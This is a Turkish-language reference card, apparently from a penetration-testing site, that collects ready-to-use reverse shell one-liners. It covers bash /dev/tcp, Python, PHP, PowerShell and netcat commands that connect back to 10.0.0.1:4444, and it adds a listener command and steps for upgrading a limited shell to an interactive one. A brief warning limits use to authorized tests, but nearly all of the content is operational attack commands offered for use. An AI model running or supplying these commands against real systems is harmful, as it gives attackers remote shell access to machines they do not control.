Reverse Shell: Hızlı Başvuru Kartı
Yetkili sızma testi senaryolarında sık kullanılan reverse shell komutlarının dil bazında özeti.
Bu kart, bir sistemde uzaktan komut çalıştırma (RCE) zafiyeti doğrulandıktan SONRA, yetkili bir test senaryosunda interaktif bir shell elde etmek için kullanılan komutları özetler.
Önce Dinleyiciyi Başlat (Kendi Makinende)
bash
nc -lvnp 4444
Bash
bash
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
Python
python
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]);'
PHP
php
php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
PowerShell (Windows)
powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4444);
Netcat (Eğer Hedefte -e Destekli Sürüm Varsa)
bash
nc -e /bin/sh 10.0.0.1 4444
Shell'i Yükseltme (Upgrade)
İlk elde ettiğin shell genelde "kısıtlı" (tab tamamlama yok, Ctrl+C ile kopuyor). Şunu dene:
bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ardından:
Ctrl+Z
stty raw -echo; fg
Export TERM=xterm
⚠️ Hatırlatma: Bu teknikler SADECE yazılı izin aldığın, yetkili sızma testi ortamlarında kullanılmalı. İzinsiz bir sisteme reverse shell açmak ciddi bir suçtur.
Bu kart, SiberCrew ekibi tarafından hazırlanmış özgün içeriktir.
Yorumlar (0)
Henüz yorum yok, bu makale hakkındaki ilk düşünceyi sen paylaş.
Yorum yapmak için giriş yap.